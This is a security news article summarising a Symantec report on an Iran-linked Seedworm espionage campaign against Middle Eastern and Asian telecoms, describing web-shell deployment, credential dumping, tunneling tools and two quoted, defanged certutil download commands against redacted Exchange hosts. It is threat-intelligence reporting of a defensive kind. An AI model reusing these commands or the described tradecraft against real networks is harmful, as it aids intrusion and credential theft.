APT

Iran-linked Seedworm APT targets Telecoms organizations across the Middle East and Asia

Researchers uncovered a new Seedworm campaign targeting telecommunication and IT service providers in the Middle East and Asia.

Iran-linked APT group Seedworm (aka MERCURYMuddyWaterTEMP.Zagros, or Static Kitten) is behind a new cyberespionage campaign targeting telecommunication and IT service providers in the Middle East and Asia, Symantec warns.

The Seedworm has been active since at least 2017, the recent campaign has been conducted over the past six months and targeted entities in Israel, Jordan, Kuwait, Saudi Arabia, the United Arab Emirates, Pakistan, Thailand, and Laos.

The threat actors don’t use custom malware and instead rely on legitimate tools, publicly available malware, and living-off-the-land tactics.

The attackers focus on Exchange Servers in the attempt to deploy web shells to establish a backdoor within the target network. 

Once breached a targeted network, the threat actors attempt to steal credentials and make lateral movements.

“Attackers most likely linked to Iran have attacked a string of telecoms operators in the Middle East and Asia over the past six months, in addition to a number of IT services organizations and a utility company.” reads the report published by the experts. “In most attacks, the infection vector is unknown. Evidence of a possible vector was found at only one target. A suspected ScreenConnect setup MSI appeared to have been delivered in a zipped file named “Special discount program.zip”, suggesting that it arrived in a spear-phishing email.”

In one case analyzed by the researchers, attackers used a ZIP file named “Special discount program.zip,” which contained an installer for a remote desktop software application. The malicious archive was likely spread through spear-phishing messages.

In one of the attacks aimed at a telecommunication firm in the Middle East that began in August 2021, the threat actors created a service to launch an unknown Windows Script File (WSF) used to perform reconnaissance on the network

Then the attackers used PowerShell to download and execute more WSFs, then used Certutil to download tunneling tools and run WMI, which was used to get remote machines to carry out the following tasks:

  • Execute Certutil to download an unknown file
  • Execute Certutil to download an unknown WSF file and execute Wscript to launch this script
  • Execute PowerShell to download and execute content
  • Execute PowerShell to download a suspected web shell to an Exchange Server

Attackers mixed the use of scripts to automate the operations with the use of a manual approach as part of some intrusion.

Once established a foothold on the target network, the cyberspies use the eHorus remote access tool to do the following actions:

  1. Deliver and run a (suspected) Local Security Authority Subsystem Service (LSASS) dumping tool.
  2. Deliver (what are believed to be) Ligolo tunneling tools.
  3. Execute Certutil to request a URL from Exchange Web Services (EWS) of (what appears to be) other targeted organizations.

In the recent campaign against telecommunication, the attackers may have attempted to pivot to other targets by connecting to the Exchange Web Services (EWS) of other organizations. Threat actors used the following commands, likely to check connectivity to these organizations:

certutil.exe -urlcache –split [DASH]f hxxps://[REDACTED]/ews/exchange[.]asmx
certutil.exe -urlcache -split [DASH]f hxxps://webmail.[REDACTED][.]com/ews

Symantec reported that the attackers made heavy use of legitimate tools and publicly available hacking tools, including:

  • ScreenConnect: Legitimate remote administration tool
  • RemoteUtilities: Legitimate remote administration tool
  • eHorus: Legitimate remote administration tool
  • Ligolo: Reverse tunneling tool
  • Hidec: Command line tool for running a hidden window
  • Nping: Packet generation tool
  • LSASS Dumper: Tool that dumps credentials from Local Security Authority Subsystem Service (LSASS) process
  • SharpChisel: Tunneling tool
  • Password Dumper
  • CrackMapExec: Publicly available tool that is used to automate security assessment of an Active Directory environment
  • ProcDump: Microsoft Sysinternals tool for monitoring an application for CPU spikes and generating crash dumps, but which can also be used as a general process dump utility
  • SOCKS5 proxy server: Tunneling tool
  • Keylogger: Retrieves browser credentials
  • Mimikatz: Publicly available credential dumping tool

“There is some evidence to suggest that the Iranian Seedworm group was responsible for these attacks. Two IP addresses used in this campaign have been previously linked to Seedworm activity. However, Seedworm is known to regularly switch its infrastructure, meaning conclusive attribution cannot be made.” concludes the analysis. “There is also some overlap in tools between this campaign and earlier Seedworm campaigns. ScreenConnect, RemoteUtilities, SharpChisel, Ligolo, ProcDump, and Password Dumper were all referenced by Trend Micro in a March 2021 blog on Seedworm activity. In the case of two tools – SharpChisel and Password Dumper – identical versions were used in this campaign to those that were documented by Trend.”

Follow me on Twitter: @securityaffairs and Facebook

[adrotate banner=”9″][adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – hacking, Seedworm)

[adrotate banner=”5″]

[adrotate banner=”13″]

Pierluigi Paganini

Pierluigi Paganini is member of the ENISA (European Union Agency for Network and Information Security) Threat Landscape Stakeholder Group and Cyber G7 Group, he is also a Security Evangelist, Security Analyst and Freelance Writer. Editor-in-Chief at "Cyber Defense Magazine", Pierluigi is a cyber security expert with over 20 years experience in the field, he is Certified Ethical Hacker at EC Council in London. The passion for writing and a strong belief that security is founded on sharing and awareness led Pierluigi to find the security blog "Security Affairs" recently named a Top National Security Resource for US. Pierluigi is a member of the "The Hacker News" team and he is a writer for some major publications in the field such as Cyber War Zone, ICTTF, Infosec Island, Infosec Institute, The Hacker News Magazine and for many other Security magazines. Author of the Books "The Deep Dark Web" and “Digital Virtual Currency and Bitcoin”.

Recent Posts

Google addressed 2 Chrome zero-days demonstrated at Pwn2Own 2024

Google addressed two zero-day vulnerabilities in the Chrome web browser that have been demonstrated during…

9 hours ago

INC Ransom stole 3TB of data from the National Health Service (NHS) of Scotland

The INC Ransom extortion group hacked the National Health Service (NHS) of Scotland and is threatening…

13 hours ago

CISA adds Microsoft SharePoint bug disclosed at Pwn2Own to its Known Exploited Vulnerabilities catalog

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds a Microsoft SharePoint vulnerability disclosed at the…

19 hours ago

The DDR Advantage: Real-Time Data Defense

This is the advantage of Data Detection and Response (DDR) for organizations aiming to build…

22 hours ago

Finnish police linked APT31 to the 2021 parliament attack

The Finnish Police attributed the attack against the parliament that occurred in March 2021 to…

1 day ago

TheMoon bot infected 40,000 devices in January and February

A new variant of TheMoon malware infected thousands of outdated small office and home office…

2 days ago

This website uses cookies.